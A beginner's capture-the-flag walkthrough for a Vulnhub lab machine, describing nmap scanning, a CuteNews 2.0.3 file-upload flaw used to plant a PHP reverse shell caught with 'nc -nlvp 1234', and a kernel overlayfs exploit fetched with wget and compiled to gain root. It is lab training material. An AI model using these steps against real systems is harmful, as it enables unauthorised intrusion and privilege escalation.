In this article, we discuss a boot2root Catch The Flag(CTF) challenge. This machine could be found in Vulnhub. You should download the .OVA file from there and start the virtual machine using VMware or VirtualBox. The author of this machine is Robert Winkel. The difficulty level for this challenge is easy. It is also recommended for beginners who look forward to penetration testing.

Level: easy

First, try to find the IP address of the vulnerable machine and then scan that IP address.

Make sure your kali Linux and the vulnerable OS are within the same network. Once the machine is booted in the virtual machine, open your kali terminal. Find your kali machine IP Address using ifconfig. Now, we use NMAP scan to find the different networks connected to the same network.

On using this command you will get the details of other devices connected to that network. Identify the IP Address of the vulnerable machine and use the Nmap scan to find the services running on the various ports.

We find that only one TCP port is open with port number 80. This port is generally used to receive WebPage requests from the HTTP servers. To check the response we open a web browser and put the IP address.

We find that a login page is hosted at that IP address. There is not much information on the web page except asking for username and password for login or asking to register as a new user.

In order to collect more information, we go for an aggressive scan using Nmap by using nmap -A. This provides the details of OS, detects the version, traceroute, etc.

So we notice for login a service known as Cutenews is being used. Also, the cuteness version which is 2.0.3 is mentioned on the web page.

So we use the searchsploit command to find any exploit for cutenews 2.0.3. We find some hints in the exploit-db under the name "Arbitrary File Upload".

Click here to see the exploit for cutenews 2.0.3.

The instructions ask us to register as a new user and then it will allow us to log in. After which we should be able to upload a PHP file. Hence it is clear that we have to use PHP reverse shell to establish a shell connection. Now we proceed with the given steps i.e. register and we are able to reach the dashboard.

Click here to download the php-reverse-shell.php exploit.

On the dashboard when we click on the personal options we were able to land on https://www.target.com/cutenews/index.php?mod=main&opt=personal where we see a browse button for uploading an image.

Preparing the PHP Reverse Shell file for upload and starting the listener.

In the php-reverse-shell.php file, we change the IP address to my kali machine IP Address and the listening PORT to 1234. This will create a shell connection to my kali machine at port number 1234. We open another terminal to write start listening to the response using the Netcat command "nc -nlvp 1234".

Now, we click on the browse button and upload the PHP file and click on "save changes". Now we right-click on the image area and click on inspect. On clicking the inspect button we get the IMG tag in the HTML file. We open the source link in that tag and we see that we have got back a reverse shell connection.

Privilege Escalation to get into the root folder and access the flag.txt file

We check we are not a root user using commands like id or whoami. We note that currently we are logged in as www-data. We also use uname -a to check the Linux kernel version which is 3.16.0-30-generic. So our target is to get into root privileges by exploiting this and then get access to the root folder.

On doing ls we can see the list of directories. We moved inside "/tmp" for executing the exploits. Using wget we download a bash file named Linux-Exploit-Suggester.sh and give it executable permissions using chmod. As the name suggests on the execution of this bash file, it provides the list of exploits to which the system might be vulnerable and also provide the download link and the probability of the exploit.

Click here to download the Linux-Exploit-Suggester.sh

So we choose to use the 'overlayfs' Local Privilege Escalation. We use wget to download this exploit from the exploit-db directly into the system and give it executable permission using chmod. On reading the instructions we note that this needs to be compiled using a gcc compiler. So we use gcc --version to check if the C compiler is already installed into the system.

Click here to download the overlays exploit from exploit-db.

Now we compile the downloaded C code and create an output file named exploit using gcc. Now we run the exploit using "./exploit". We note that the "$" sign changes to "#" which is only when we are logged in as root. Now when we check the id we see that it has changed to root. Hence we are able to escalate our privileges to root.

Now we change the directory and move to root. On doing ls we find the flag.txt which is our target. We see the content of the flag.txt using cat flag.txt and we have completed this CTF challenge successfully.

Please refer to the video tutorial in case of any doubts.

Please comment below for suggestions and questions.